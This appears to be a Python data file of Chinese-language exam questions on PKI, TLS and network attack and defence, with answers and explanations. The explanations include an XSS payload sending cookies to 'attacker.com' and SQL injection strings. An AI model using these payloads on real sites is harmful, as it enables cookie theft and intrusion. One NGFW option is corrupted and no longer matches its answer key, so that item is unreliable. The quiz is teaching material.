         "數位簽章鐵三角防禦：<br>1. 來源認證（Authenticity）：只有持私鑰的本人才能簽出此簽名，公鑰能解開證明必為本人所發。<br>2. 完整性（Integrity）：若內容被改 1 個字，接收端算出的 Hash 與解開的簽章摘要不符，立刻抓包。<br>3. 不可否認性（Non-Repudiation）：因為全世界只有發送者擁有該私鑰，事後無法抵賴辯稱「這不是我發的」。"),
        ("公鑰基礎設施（<span class=\"en\">PKI</span>）中，數位憑證（Digital Certificate，如 X.509）的最核心使命為？",
         "由受信任的公正第三方憑證授權中心（CA, Certificate Authority）以其自身私鑰進行數位簽章，將「特定主體的真實身分」與其「公開金鑰（Public Key）」實施防篡改的權威綁定",
         ["由受信任的公正第三方憑證授權中心（CA, Certificate Authority）以其自身私鑰進行數位簽章，將「特定主體的真實身分」與其「公開金鑰（Public Key）」實施防篡改的權威綁定",
          "保證該伺服器永遠不會被駭客入侵或感染病毒",
          "保證使用者在該網站購物的商品品質優良",
          "免費提供高畫質影片下載"],
         "解決公鑰偽造信任鏈危機：若無 CA，駭客可冒充 `google.com` 頒發自己的公鑰給用戶，進行中間人竊聽。X.509 憑證將 (主體名稱 `google.com`, Google 公鑰, 有效期限) 打包，由全球各大作業系統與瀏覽器內建預先信任的根 CA（Root CA）簽署。用戶端用內建的 Root CA 公鑰校驗憑證鏈，確認眼前這個公鑰確實 100% 屬於 Google 本人。"),
        ("線上憑證狀態協定（<span class=\"en\">OCSP, Online Certificate Status Protocol</span>）相較於傳統憑證撤銷清單（<span class=\"en\">CRL, Certificate Revocation List</span>）的核心優勢為？",
         "OCSP 提供即時的單一憑證狀態即時線上查詢，無須像 CRL 那樣每次下載體積龐大數十 MB 的完整過期撤銷黑名單列表，大幅減少網路頻寬消耗與連線延遲",
         ["OCSP 提供即時的單一憑證狀態即時線上查詢，無須像 CRL 那樣每次下載體積龐大數十 MB 的完整過期撤銷黑名單列表，大幅減少網路頻寬消耗與連線延遲",
          "OCSP 完全不需要連接網際網路",
          "OCSP 只能在微軟伺服器上使用",
          "OCSP 可以自動續約過期的憑證"],
         "憑證撤銷檢驗機制：當伺服器私鑰外洩被吊銷時，客戶端必須即時得知。<br>1. CRL（撤銷清單）：CA 定期發布全體吊銷名單，檔案肥大且更新週期長（存在空窗期）。<br>2. OCSP（即時協議）：客戶端拿憑證序號即時問 CA「這張有效嗎？」，CA 回應 Good/Revoked。<br>3. OCSP 裝訂（OCSP Stapling）：伺服器自己向 CA 拿取帶有 CA 簽章的時間戳 OCSP 回應，直接附在 TLS 握手中給客戶端，徹底免除客戶端對外連線 CA 的額外延遲與隱私洩漏。"),
        ("在傳輸層安全協定 TLS 1.3 的握手（Handshake）過程中，標準建立連線所需的來回時間（RTT）為多少？相較於 TLS 1.2 有何重大提速？",
         "TLS 1.3 標準握手僅需「1 個 RTT」（甚至在恢復連線時支援 0-RTT）；相較於 TLS 1.2 的 2 個 RTT，握手延遲直接減半",
         ["TLS 1.3 標準握手僅需「1 個 RTT」（甚至在恢復連線時支援 0-RTT）；相較於 TLS 1.2 的 2 個 RTT，握手延遲直接減半",
          "TLS 1.3 需要 5 個 RTT",
          "TLS 1.3 與 TLS 1.2 延遲完全相同",
          "TLS 1.3 必須等待 10 秒才能完成握手"],
         "TLS 1.3 革命性 1-RTT 握手（RFC 8446）：<br>‧ TLS 1.2 需 2 個往返：ClientHello -> ServerHello -> 證書+金鑰參數 -> Client Key Exchange -> Finished。<br>‧ TLS 1.3 提速為 1-RTT：客戶端大膽假設伺服器支援常見的 ECC 曲線，在發送第 1 個 ClientHello 時直接附帶自身的「密鑰共享參數（Key Share）」。伺服器回送 ServerHello + Key Share + 憑證 + 握手 Finished。僅僅 1 個來回，加密金鑰已經計算就緒，緊接著第 3 個封包即可發送加密 HTTP 請求！"),
        ("下列加密演算法與運作模式中，在安全標準已經全面被判定為「破損不安全（Broken / Insecure）」應嚴禁繼續使用的是？",
         "DES、3DES、RC4、MD5 與 SHA-1",
         ["DES、3DES、RC4、MD5 與 SHA-1",
          "AES-256、ChaCha20、SHA-256 與 ECC",
          "RSA 4096、AES-128-GCM、SHA-3",
          "Ed25519、Curve25519、HMAC-SHA256"],
         "廢棄弱加密清單：<br>1. DES: 金鑰僅 56-bit，專用硬體數小時內暴力破解。<br>2. 3DES: 區塊僅 64-bit，易遭 Sweet32 碰撞攻擊，已被全面退役。<br>3. RC4: WEP/TLS 串流加密，存在統計偏誤與密鑰洩漏漏洞。<br>4. MD5 & SHA-1: 碰撞攻擊早已在實務中實現（Google 於 2017 年生成 SHAttered 碰撞 PDF 檔案）。現代資安基準全面強制要求 AES-GCM, SHA-256 以上等級。"),
        ("在認證加密（<span class=\"en\">AEAD, Authenticated Encryption with Associated Data</span>）中，如 AES-GCM 或 ChaCha20-Poly1305，其相較於傳統「先加密再 MAC」的最突出優勢為？",
         "將「機密性加密」與「訊息完整性認證」在單一演算法架構中同時硬體並行執行，徹底杜絕密文填補神諭攻擊（Padding Oracle Attack）並具備極致硬體效能",
         ["將「機密性加密」與「訊息完整性認證」在單一演算法架構中同時硬體並行執行，徹底杜絕密文填補神諭攻擊（Padding Oracle Attack）並具備極致硬體效能",
          "不需要使用任何金鑰",
          "只能在沒有網路線時使用",
          "可以自動將檔案壓縮為零位元組"],
         "AEAD 劃時代標準：傳統 CBC 模式需手動實施 PKCS#7 Padding，實作者常犯下嚴重的 Padding Oracle 漏洞（如 POODLE, Lucky Thirteen 攻擊，駭客藉由解密時回傳的報錯時延差異破解密文）。AEAD（如 GCM）在硬體層級同步輸出加密密文與 128 位元的驗證標籤（Auth Tag），且允許保護未加密的關聯資料（AAD，如 IP 標頭），TLS 1.3 規定「必須且僅能使用 AEAD 密碼套件」。"),
        ("公開金鑰基礎設施（PKI）在驗證數位憑證時，如果目標憑證的簽署 CA 自身又被上一層 CA 所簽署，此種逐級向上追溯的結構稱為？",
         "憑證信任鏈（Certificate Chain of Trust），最終必須錨定在作業系統本地受信的「根憑證（Root CA Certificate / Trust Anchor）」",
         ["憑證信任鏈（Certificate Chain of Trust），最終必須錨定在作業系統本地受信的「根憑證（Root CA Certificate / Trust Anchor）」",
          "區塊鏈比特幣網路",
          "蜘蛛網拓撲",
          "分散式雜湊表（DHT）"],
         "信任鏈解析：<br>1. 伺服器終端實體憑證（End-Entity Cert，如 `google.com`）。<br>2. 中介憑證授權中心（Intermediate CA，如 Google Trust Services）。中介 CA 是為了保護根 CA 私鑰平時處於離線物理斷網狀態，僅由中介 CA 負責日常簽發。<br>3. 根憑證授權中心（Root CA）：自簽名（Self-signed）憑證，內建於 Windows/macOS/iOS/瀏覽器信任庫中。只要信任鏈完整簽名可達 Root CA，連線即被信任。"),
        ("若某網站配置了 HTTPS，但在瀏覽器中輸入該網址時，瀏覽器卻彈出「您的連線不是私人連線 / NET::ERR_CERT_COMMON_NAME_INVALID」嚴重安全警告，最常見的配置錯誤為？",
         "憑證中的「主體替代名稱（SAN, Subject Alternative Name）」或通用名稱（CN）與瀏覽器網址列所輸入的網域名稱「不匹配」",
         ["憑證中的「主體替代名稱（SAN, Subject Alternative Name）」或通用名稱（CN）與瀏覽器網址列所輸入的網域名稱「不匹配」",
          "使用者的網路線插錯插槽",
          "電腦螢幕解析度設定太低",
          "網站伺服器硬碟損壞"],
         "憑證錯誤排查四巨頭：<br>1. COMMON_NAME_INVALID：網址是 `api.example.com`，但憑證只簽發給 `www.example.com`（網域不符）。<br>2. CERT_DATE_INVALID：憑證已過期，或本機電腦的時鐘年份被設錯。<br>3. CERT_AUTHORITY_INVALID：自簽名憑證或該 CA 不在受信任根憑證庫中。<br>4. CERT_REVOKED：憑證已被 CA 吊銷。")
    ]

    # 3. 網路攻擊技術與次世代資通防禦體系 (18 題)
    attack_defense_data = [
        ("SQL 資料隱碼攻擊（<span class=\"en\">SQL Injection</span>）的攻擊原理為？軟體工程中最根本且具備徹底根治效果的防禦措施為？",
         "攻擊者將未經過濾的惡意 SQL 代碼片段拼裝注入進後端查詢指令中，操縱資料庫執行非預期邏輯；根本解法為採用「參數化查詢（Parameterized Queries / Prepared Statements）」",
         ["攻擊者將未經過濾的惡意 SQL 代碼片段拼裝注入進後端查詢指令中，操縱資料庫執行非預期邏輯；根本解法為採用「參數化查詢（Parameterized Queries / Prepared Statements）」",
          "攻擊者用雷射光照射資料庫硬碟；解法為更換固態硬碟",
          "將資料庫中的所有資料表全部刪除",
          "僅使用字串黑名單過濾單引號"],
         "SQLi 深度原理：若後端代碼拼接 `query = \"SELECT * FROM users WHERE name='\" + user_input + \"'\"`。攻擊者輸入 `' OR '1'='1`，SQL 語法樹被惡意篡改為永真式，未授權洩漏全表。黑名單過濾易遭雙重編碼或大小寫繞過。預編譯（Prepared Statements）將 SQL 語法結構在資料庫先行編譯固化，使用者輸入作為純資料運算元（Placeholder）傳入，即使輸入包含 SQL 語法亦 100% 僅被當作純文字字串處理，根本杜絕注入。"),
        ("跨站腳本攻擊（<span class=\"en\">XSS, Cross-Site Scripting</span>）的三大主要類型為？其在使用者瀏覽器中執行的惡意行為主要為？",
         "儲存型（Stored）、反射型（Reflected）與 DOM 型（DOM-based）；惡意 JavaScript 在受害者瀏覽器環境下執行，竊取 Cookie/LocalStorage 憑證或強制發起非預期行為",
         ["儲存型（Stored）、反射型（Reflected）與 DOM 型（DOM-based）；惡意 JavaScript 在受害者瀏覽器環境下執行，竊取 Cookie/LocalStorage 憑證或強制發起非預期行為",
          "硬體型、光纖型與無線型",
          "病毒型、木馬型與蠕蟲型",
          "純文字型、圖片型與影片型"],
         "XSS 類型剖析：<br>1. 儲存型（最危險）：惡意 script 被持久化存入資料庫（如論壇留言板），所有瀏覽該頁面的訪客全部集體中招。<br>2. 反射型：惡意代碼嵌在 URL 參數中（如搜尋關鍵字），點擊釣魚連結時由後端反射輸出至頁面。<br>3. DOM 型：純前端 JS 讀取 URL hash 渲染頁面漏洞，不經過後端伺服器。<br>防護：嚴格的上下文上下文相關 HTML/JS 實體跳脫編碼（Escaping）與部署嚴格的內容安全政策（CSP, Content Security Policy）。"),
        ("內容安全政策（<span class=\"en\">CSP, Content Security Policy</span>）在 HTTP 回應標頭中的核心防護作用為？",
         "白名單機制，嚴格限制瀏覽器僅能載入與執行來自特定信任網域的腳本、樣式與多媒體資源，並禁止執行內嵌腳本（Inline Scripts）與 `eval()`，有效扼殺 XSS 攻擊",
         ["白名單機制，嚴格限制瀏覽器僅能載入與執行來自特定信任網域的腳本、樣式與多媒體資源，並禁止執行內嵌腳本（Inline Scripts）與 `eval()`，有效扼殺 XSS 攻擊",
          "限制使用者的電腦只能在上班時間上網",
          "防止網頁文字被使用者複製貼上",
          "自動加速網頁中圖片的下載時間"],
         "CSP 標頭強大防禦：例如配置 `Content-Security-Policy: default-src 'self'; script-src 'self' https://trustedscripts.com`。此時即使駭客成功將 `<script>fetch('http://attacker.com/steal?'+document.cookie)</script>` 注入進網頁，瀏覽器解析引擎一律拒絕執行內嵌 script，且禁止向外域 `attacker.com` 發起任何外傳請求，成為防範 XSS 的終極兜底防線。"),
        ("次世代防火牆（<span class=\"en\">NGFW, Next-Generation Firewall</span>）相較於傳統傳統狀態檢查防火牆（Stateful Inspection Firewall），最顯著的架構能力超越為？",
         "具備「深度封包檢測（DPI, Deep Packet Inspection）」能力，能穿透傳輸層埠號識別真實的第七層應用程式（Application Visibility），並整合入侵防禦（IPS）、SSL/TLS 流量解密檢查與威脅情報",
         ["具備「深度封包檢測（DPI, Deep Packet Inspection）」能力，能穿透傳輸層埠號識別真實的第七層應用程式（Application Visibility），並 Client-Side 整合",
          "NGFW 完全不需要電源即可運作",
          "NGFW 的實體重量比傳統防火牆輕十倍",
          "NGFW 只能用於防禦外部駭客，內部網路無法使用"],
         "傳統防火牆死角：傳統防火牆只看五元組 (Src IP, Dst IP, Src Port, Dst Port, Proto)。若駭客將木馬外聯流量偽裝在 Port 443 或 80 上，傳統防火牆一律放行。NGFW 不盲信埠號，執行七層特徵指紋分析（即使 BitTorrent 或影子 IT 跑在 Port 80 也能一眼揪出），且能將 TLS 流量在線解密（SSL Inspection）進行反病毒與漏洞利用掃描，現代邊界安全絕對核心。"),
        ("入侵偵測系統（<span class=\"en\">IDS</span>）與入侵防禦系統（<span class=\"en\">IPS</span>）在網路部署架構與防禦動作上的最根本區別為？",
         "IDS 通常採「旁路監聽部署（Out-of-Path / Sniffer）」，僅被動偵測威脅並發送警報（Alert），無法在線主動阻斷；IPS 採「串聯內嵌部署（In-Line）」，能即時攔截並直接阻斷（Drop）惡意攻擊封包",
         ["IDS 通常採「旁路監聽部署（Out-of-Path / Sniffer）」，僅被動偵測威脅並發送警報（Alert），無法在線主動阻斷；IPS 採「串聯內嵌部署（In-Line）」，能即時攔截並直接阻斷（Drop）惡意攻擊封包",
          "IDS 速度快，IPS 速度慢",
          "IDS 只能在無線網路上運作，IPS 只能在光纖上運作",
          "兩者部署架構完全相同無差異"],
         "IDS vs IPS 部署實務：<br>1. IDS（Intrusion Detection System）：接在交換機的 SPAN 鏡像埠上，不介入正常轉發路徑，萬一 IDS 設備當機亦「絕對不影響業務網路通訊」，但發現攻擊時只能通知管理員。<br>2. IPS（Intrusion Prevention System）：像收費站一樣卡在流量咽喉，發現 SQLi 或 Buffer Overflow 攻擊瞬間直接在線 Drop 該封包或重設 TCP 連線（RST）；缺點是若誤判（False Positive）會誤傷合法業務，若設備崩潰會引發全網斷線（需具備硬體 Bypass 機制）。"),
        ("網頁應用程式防火牆（<span class=\"en\">WAF, Web Application Firewall</span>）在資通防護體系中的專屬防護目標為？",
         "專門針對「第七層（應用層）Web 業務邏輯與通訊」進行深度檢查，專屬防禦 OWASP Top 10 威脅（如 SQLi、XSS、命令注入、檔案包含漏洞與惡意爬蟲）",
         ["專門針對「第七層（應用層）Web 業務邏輯與通訊」進行深度檢查，專屬防禦 OWASP Top 10 威脅（如 SQLi、XSS、命令注入、檔案包含漏洞與惡意爬蟲）",
          "專門用於阻斷第三層 ICMP 封包",
          "專門用於防止實體線纜被老鼠咬斷",
          "專門用於加密伺服器硬碟中的作業系統檔案"],
         "WAF 專業定位：傳統網絡防火牆與 NGFW 是看整體網路流。而 WAF 深入理解 HTTP/HTTPS 協議細節，解析 JSON/XML/Form 數據，分析 Cookie 與 Request Header。當黑客嘗試透過 `?id=1 UNION SELECT ...` 滲透時，WAF 第一時間進行語義分析阻斷，在 Web 伺服器程式碼修復漏洞前提供關鍵的虛擬補丁（Virtual Patching）。"),
        ("IPsec（網際網路安全協定）體系中，兩大核心協定「AH（認證標頭）」與「ESP（封裝安全酬載）」的功能差異為？",
         "AH（協定號 51）僅提供資料完整性與來源認證，「完全不提供任何機密性加密」；ESP（協定號 50）則同時提供資料機密性加密、完整性驗證與抗重送防護",
         ["AH（協定號 51）僅提供資料完整性與來源認證，「完全不提供任何機密性加密」；ESP（協定號 50）則同時提供資料機密性加密、完整性驗證與抗重送防護",
          "AH 提供加密，ESP 不提供加密",
          "AH 只能在 Windows 上使用，ESP 只能在 Linux 上使用",
          "兩者皆只能用於傳輸純文字，無法用於 VPN"],
         "IPsec 協定對比考點：<br>1. AH（Authentication Header，IP 協定號 51）：使用 HMAC 簽署包括外層 IP 標頭在內的全體封包，資料依然是明文（任何人皆可偷看），且與 NAT 衝突。<br>2. ESP（Encapsulating Security Payload，IP 協定號 50）：採用 AES 加密 Payload，並提供可選的認證 HMAC。現代 IPsec VPN 實務中 99% 皆直接採用 ESP 協定。"),
        ("IPsec 的兩大工作模式「傳輸模式（<span class=\"en\">Transport Mode</span>）」與「穿隧模式（<span class=\"en\">Tunnel Mode</span>）」在封裝結構上的區別為？",
         "傳輸模式保留原始 IP 標頭，僅在原始 IP 標頭與傳輸層之間插入 IPsec 標頭（用於主機對主機端對端保護）；穿隧模式「將整個原始 IP 封包完整加密包裝」，並在最外層添加一個「全新的外部 IP 標頭」（用於站點對站點 Site-to-Site 網關 VPN）",
         ["傳輸模式保留原始 IP 標頭，僅在原始 IP 標頭與傳輸層之間插入 IPsec 標頭（用於主機對主機端對端保護）；穿隧模式「將整個原始 IP 封包完整加密包裝」，並在最外層添加一個「全新的外部 IP 標頭」（用於站點對站點 Site-to-Site 網關 VPN）",
          "傳輸模式速度快十倍，穿隧模式速度慢十倍",
          "傳輸模式只能在光纖中使用，穿隧模式只能在雙絞線中使用",
          "兩者封裝後的封包結構完全相同"],
         "模式封裝深度剖析：<br>‧ 傳輸模式（Transport Mode）：`[原始 IP 標頭] [ESP 標頭] [加密的 TCP/UDP + 數據] [ESP 尾部]`。外層暴露原始來源與目的 IP，適用於兩台公網伺服器直接加密通訊。<br>‧ 穿隧模式（Tunnel Mode）：`[新 IP 標頭 (閘道器A -> 閘道器B)] [ESP 標頭] [加密的 (原始私網 IP + TCP + 數據)] [ESP 尾部]`。徹底隱藏總部與分公司內部的真實私網 IP 拓撲，站點間 VPN 的黃金標準。"),
        ("零信任架構（<span class=\"en\">Zero Trust Architecture, ZTA</span>，NIST SP 800-207）相較於傳統以邊界為防護重心的城堡護城河模型（Perimeter Security），其核心哲學信條為？",
         "「永不信任，始終驗證（Never Trust, Always Verify）」；預設不信任內部或外部的任何人、設備或網路，對所有存取請求皆實施動態最小權限驗證與微隔離",
         ["「永不信任，始終驗證（Never Trust, Always Verify）」；預設不信任內部或外部的任何人、設備或網路，對所有存取請求皆實施動態最小權限驗證與微隔離",
          "一旦員工連上公司內網 Wi-Fi 即給予所有伺服器的完全控制權",
          "徹底關閉所有防火牆並開放所有連接埠",
          "禁止所有員工在電腦中使用任何密碼"],
         "零信任革命哲學：傳統邊界安全認為「防火牆外是壞人，防火牆內是好人」，一旦駭客透過釣魚郵件拿下內網某台 PC，即可橫向平移（Lateral Movement）暢通無阻洗劫整座機房。零信任假設「內網已經被滲透入侵（Assume Breach）」：任何存取必須依據 (身份, 設備健康狀態, 上下文環境) 動態核發短期最小特權（Least Privilege），透過微隔離（Micro-segmentation）阻止橫向漫延。"),
        ("根據臺灣《資通安全管理法》及施行細則規範，公務機關與特定非公務機關發生資通安全事件時，其法定的「事件通報時效」要求為？",
         "於知悉資通安全事件後，應於「1 小時內」至主管機關指定之通報系統完成通報作業",
         ["於知悉資通安全事件後，應於「1 小時內」至主管機關指定之通報系統完成通報作業",
          "於知悉後 24 小時內通報即可",
          "於事件完全調查處理完畢後一週內通報",
          "僅需在每年年底綜合彙整呈報"],
         "公職國考必考法規（資安法第 14 條及通報應變辦法）：公務機關知悉資安事件（無論是 1、2、3、4 級事件），法定「通報時效皆嚴格要求在知悉後 1 小時內」完成！復原時效則依等級區分：第一級與第二級事件應於知悉後 72 小時內完成損害控制與復原；第三級與第四級重大事件應於知悉後 36 小時內完成損害控制與復原。"),
        ("臺灣資通安全責任分級中，公務機關依其業務性質、保有資料敏感度與對國家社會之衝擊程度，共分為哪幾個等級？其中負責關鍵基礎設施（CI）維運的機關通常屬於哪一級？",
         "共分為 A、B、C、D、E 五個等級；國家關鍵基礎設施（如能源、水資源、交通、高科技園區）通常核定為「A 級」或「B 級」",
         ["共分為 A、B、C、D、E 五個等級；國家關鍵基礎設施（如能源、水資源、交通、高科技園區）通常核定為「A 級」或「B 級」",
          "共分為 1、2、3、4、5 級；關鍵基礎設施為 5 級",
          "共分為甲、乙、丙三級；關鍵基礎設施為甲級",
          "所有公務機關一律為同一個等級無須分級"],
         "責任分級制度（資安法第 7 條）：<br>‧ A級機關：全國性關鍵基礎設施、國防外交、全國性戶政財稅醫療，要求配置專職資安長、成立專責資安單位、全體導入 ISMS / CNS 27001 驗證、導入 SOC 全天候監控與每兩年一次紅隊演練。<br>‧ B級機關：區域性關鍵設施、直轄市政府。<br>‧ C/D/E級：一般地方區公所、偏遠學校等基礎防護。"),
        ("分散式阻斷服務攻擊（<span class=\"en\">DDoS</span>）中的「慢速連線攻擊（<span class=\"en\">Slowloris</span>）」在應用層的微觀運作手法為？",
         "攻擊者向 Web 伺服器建立大量合法 TCP 連線並發送 HTTP 請求，但刻意「以極其緩慢的間隔（如每隔數十秒）發送不完整的標頭片段」，使伺服器的並行連線池（Connection Pool）被長期霸佔耗盡而無法服務他人",
         ["攻擊者向 Web 伺服器建立大量合法 TCP 連線並發送 HTTP 請求，但刻意「以極其緩慢的間隔（如每隔數十秒）發送不完整的標頭片段」，使伺服器的並行連線池（Connection Pool）被長期霸佔耗盡而無法服務他人",
          "發送超高頻率的百萬封包將光纖實體頻寬塞爆",
          "向伺服器機房發射電磁脈衝彈",
          "暴力猜測伺服器的管理員密碼"],
         "Slowloris 慢速 DoS 巧思：傳統 DDoS 靠幾百 Gbps 的流量碾壓（容易被流量清洗中心攔截）。Slowloris 僅需一台電腦、幾 kbps 的微薄頻寬：向 Apache 建立數千個 HTTP 請求，故意不發出結尾的雙換行 `\\r\\n\\r\\n`，而是每隔 20 秒發送一個無關痛癢的標頭如 `X-a: b\\r\\n`。每個請求死死霸佔一個 worker 執行緒，伺服器迅速耗盡 MaxClients（如 256 或 1024），合法訪客被拒絕連線。防禦：配置反向代理如 Nginx 或設定積極的請求標頭逾時（client_header_timeout）。"),
        ("軟體漏洞利用中，「緩衝區溢位攻擊（<span class=\"en\">Buffer Overflow</span>）」在 x86 堆疊架構中的破壞機制為？現代作業系統採用的三大標準防禦機制為？",
         "寫入超出分配邊界的資料覆蓋堆疊框架上的「回傳位址（Return Address）」，將 CPU 執行流程劫持跳轉至惡意 Shellcode；防禦機制為 ASLR（位址空間配置隨機化）、DEP / NX（資料執行防止）與 Stack Canaries（金絲雀標記）",
         ["寫入超出分配邊界的資料覆蓋堆疊框架上的「回傳位址（Return Address）」，將 CPU 執行流程劫持跳轉至惡意 Shellcode；防禦機制為 ASLR（位址空間配置隨機化）、DEP / NX（資料執行防止）與 Stack Canaries（金絲雀標記）",
          "將記憶體中的資料完全清空；防禦機制為更換主機板",
          "利用高電壓擊穿記憶體晶片；防禦機制為安裝保險絲",
          "在程式碼中注入大量註解；防禦機制為編譯器優化"],
         "經典二進位漏洞防禦三道鐵壁：<br>1. Stack Canary：函數返回前檢查棧幀邊界的一個隨機魔數，若被溢出覆蓋立刻拋出崩潰終止，防範覆蓋返回位址。<br>2. DEP / NX（No-Execute）：標記堆疊（Stack）與堆積（Heap）為不可執行頁面，即使注入 Shellcode 亦無法直接被 CPU 執行。<br>3. ASLR（Address Space Layout Randomization）：每次開機程式的代碼段、庫函式（libc）、堆疊基址隨機隨機漂移，攻擊者無法猜測固定跳轉位址。"),
        ("「中間人攻擊（<span class=\"en\">MITM</span>）」中的「SSL 剝離（<span class=\"en\">SSL Stripping</span>）」手法為？網站管理員可部署何種安全標頭來徹底免疫此攻擊？",
         "駭客攔截並將伺服器回傳的所有 HTTPS 連結強制降級改寫為明文 HTTP 與受害者通訊，而自身與真實伺服器維持 HTTPS；防禦策略為啟用「HSTS（HTTP 嚴格傳輸安全標頭）」",
         ["駭客攔截並將伺服器回傳的所有 HTTPS 連結強制降級改寫為明文 HTTP 與受害者通訊，而自身與真實伺服器維持 HTTPS；防禦策略為啟用「HSTS（HTTP 嚴格傳輸安全標頭）」",
          "駭客使用物理工具剝開光纖的外皮竊聽；防禦為更換鋼管保護",
          "將使用者的密碼直接以明文顯示在螢幕上；防禦為關閉螢幕",
          "強制作業系統降級為 Windows XP；防禦為升級系統"],
         "SSL Stripping 與 HSTS 攻防：<br>1. 攻擊手法：受害者在公共 Wi-Fi 輸入 `http://bank.com`，黑客的中間人代理截獲，向銀行以 HTTPS 獲取網頁，但把給受害者的所有回包全部改為 `http://`。受害者全程處於明文 HTTP 通訊，密碼帳號被看光。<br>2. HSTS（RFC 6797）防護：伺服器回傳 `Strict-Transport-Security: max-age=31536000; includeSubDomains; preload`。瀏覽器收到後硬性記憶，在未來 1 年內「只要遇到該網址，即使使用者手動輸入 http://，瀏覽器也在本機強制內部重定向轉為 https://」，徹底粉碎降級攻擊！"),
        ("跨站請求偽造（CSRF）與跨站腳本攻擊（XSS）在攻擊核心本質上的最關鍵差別為？",
         "XSS 是攻擊者「在目標受信任網站中執行惡意代碼」；CSRF 則是攻擊者「在未授權情況下，誘騙受害者瀏覽器藉助其已建立的合法身分（Cookie）向目標網站發起非預期的偽造操作」",
         ["XSS 是攻擊者「在目標受信任網站中執行惡意代碼」；CSRF 則是攻擊者「在未授權情況下，誘騙受害者瀏覽器藉助其已建立的合法身分（Cookie）向目標網站發起非預期的偽造操作」",
          "XSS 只能攻擊手機，CSRF 只能攻擊電腦",
          "XSS 是硬體攻擊，CSRF 是軟體攻擊",
          "兩者本質完全相同無任何區別"],
         "攻防本質精準區分：<br>‧ XSS（跨站腳本）：核心在於「獲取腳本執行權限」，能偷取資料、操縱 DOM。<br>‧ CSRF（跨站請求偽造）：攻擊者「拿不到受害者的 Cookie（無法偷窺資料）」，但他能「借刀殺人」：利用瀏覽器跨站自動攜帶 Cookie 的特性，悄悄用受害者的身分幫受害者點擊「轉帳」或「改密碼」按鈕。防禦思路完全不同。"),
        ("社會工程學（<span class=\"en\">Social Engineering</span>）攻擊手法中，針對特定高階主管或關鍵人員量身打造的極高精準度釣魚攻擊稱為？",
         "鯨釣攻擊（Whaling / 魚叉式釣魚 Spear Phishing）",
         ["鯨釣攻擊（Whaling / 魚叉式釣魚 Spear Phishing）",
          "水坑攻擊（Watering Hole）",
          "中間人攻擊（MITM）",
          "分散式阻斷服務（DDoS）"],
         "社交工程類型辨析：<br>1. 魚叉式釣魚（Spear Phishing）：鎖定特定企業或部門，客製化研究其組織架構與公文用語發送專屬郵件。<br>2. 鯨釣（Whaling）：專門鎖定組織最高階「大鯨魚」（如執行長 CEO、財務長 CFO、政府局處長），冒充合作夥伴或董事會要求緊急匯款（商業電子郵件詐騙 BEC）。<br>3. 水坑攻擊（Watering Hole）：駭客預先在目標人員經常造訪的專業行業網站（如水坑）植入惡意水坑木馬，靜候目標上門感染。"),
        ("企業建立資通安全縱深防禦（<span class=\"en\">Defense-in-Depth</span>）架構時，核心原則何者完全正確？",
         "不依賴任何單一安全控制措施，而在實體層、周邊網路層、內部網路層、主機作業系統層、應用程式層與資料層等「多個維度層層設防」，確保單一層防禦被攻破時其餘層仍能有效阻止威脅擴散",
         ["不依賴任何單一安全控制措施，而在實體層、周邊網路層、內部網路層、主機作業系統層、應用程式層與資料層等「多個維度層層設防」，確保單一層防禦被攻破時其餘層仍能有效阻止威脅擴散",
          "只要購買一台全世界最貴的防火牆即可徹底取消其他所有安全措施",
          "強制所有員工每天下班時拔掉電腦硬碟",
          "縱深防禦代表將機房伺服器埋在地下 100 公尺處"],
         "縱深防禦多層體系：實體安防（門禁/CCTV） -> 網路周界（NGFW/WAF/DDoS清洗） -> 網絡內部（VLAN/微隔離/802.1X） -> 主機層（EDR/補丁管理/主機防火牆） -> 應用層（輸入驗證/安全代碼審計） -> 資料層（靜態透明加密/嚴格動態遮罩/外洩防護 DLP）。層層嵌套，消除單點破防崩潰風險。"),
        ("美國 NIST SP 800-207 所定義的「零信任架構（<span class=\"en\">Zero Trust Architecture, ZTA</span>）」三大核心戰略支柱與原則為？",
         "持續驗證（Never Trust, Always Verify）、授予最小特權（Least Privilege Access）與假定已遭入侵（Assume Breach）",
         ["持續驗證（Never Trust, Always Verify）、授予最小特權（Least Privilege Access）與假定已遭入侵（Assume Breach）",
          "信任內網一切連線、僅阻擋外網封包、不進行任何內部身分審查",
          "完全依靠固定實體 IP 進行身分信任、取消多因素驗證機制",
          "只要通過一次 VPN 帳號密碼登入，後續便可無限期任意存取所有內部伺服器"],
         "零信任核心思維（ZTA）：從傳統以「邊界為基礎（Perimeter-based）」的防護轉移為「以資源保護為中心」。核心三大假定：1. 從不信任，一律驗證：無論連線來自內網還是外網，均需動態評估使用者身分、設備合規性、環境風險；2. 最小特權原則：僅授予完成當前操作所需的極限權限，隨用隨撤；3. 假定系統已被攻破：實施網路微隔離（Micro-segmentation），限制橫向移動（Lateral Movement）。"),
        ("資安監控中心（SOC）中，安全資訊與事件管理（<span class=\"en\">SIEM</span>）與安全協調、自動化與回應（<span class=\"en\">SOAR</span>）的協同分工關係為？",
         "SIEM 負責多來源日誌收集、事件關聯分析與威脅告警；SOAR 則透過劇本（Playbook）協調多種安全工具進行自動化調查與主動遏止回應",
         ["SIEM 負責多來源日誌收集、事件關聯分析與威脅告警；SOAR 則透過劇本（Playbook）協調多種安全工具進行自動化調查與主動遏止回應",
          "SIEM 是硬體路由器，SOAR 是交換器，兩者均無法分析日誌",
          "SIEM 專門負責發送垃圾郵件，SOAR 專門負責備份資料庫",
          "SOAR 僅能收集防火牆日誌，無法執行任何自動化阻斷腳本"],
         "SOC 雙核心技術：SIEM（Security Information and Event Management）強於海量 Log 彙總、正規化、關聯規則比對與合規報告產出；SOAR（Security Orchestration, Automation, and Response）強於自動化回應（如發現可疑惡意 IP 時，自動透過 API 指令封鎖防火牆、隔離染毒終端並通知管理員），大幅縮短平均回應時間（MTTR）。"),
        ("端點偵測與回應（<span class=\"en\">EDR, Endpoint Detection and Response</span>）相較於傳統特徵碼防毒軟體（Traditional Antivirus）的最核心技術演進為？",
         "EDR 持續收集並記錄端點系統層級的各類行為遙測數據（行程樹狀派生、登錄檔異動、網路連線），利用行為分析偵測無檔案（Fileless）惡意程式，並提供遠端主機隔離與威脅獵捕能力",
         ["EDR 持續收集並記錄端點系統層級的各類行為遙測數據（行程樹狀派生、登錄檔異動、網路連線），利用行為分析偵測無檔案（Fileless）惡意程式，並提供遠端主機隔離與威脅獵捕能力",
          "EDR 只能比對已知靜態雜湊值（MD5/SHA256），無法分析任何執行時行為",
          "EDR 是一種安裝在核心交換器上的硬體設備，端點主機無需安裝代理程式",
          "EDR 僅能防止實體 USB 隨身碟插入，對網路惡意活動完全無效"],
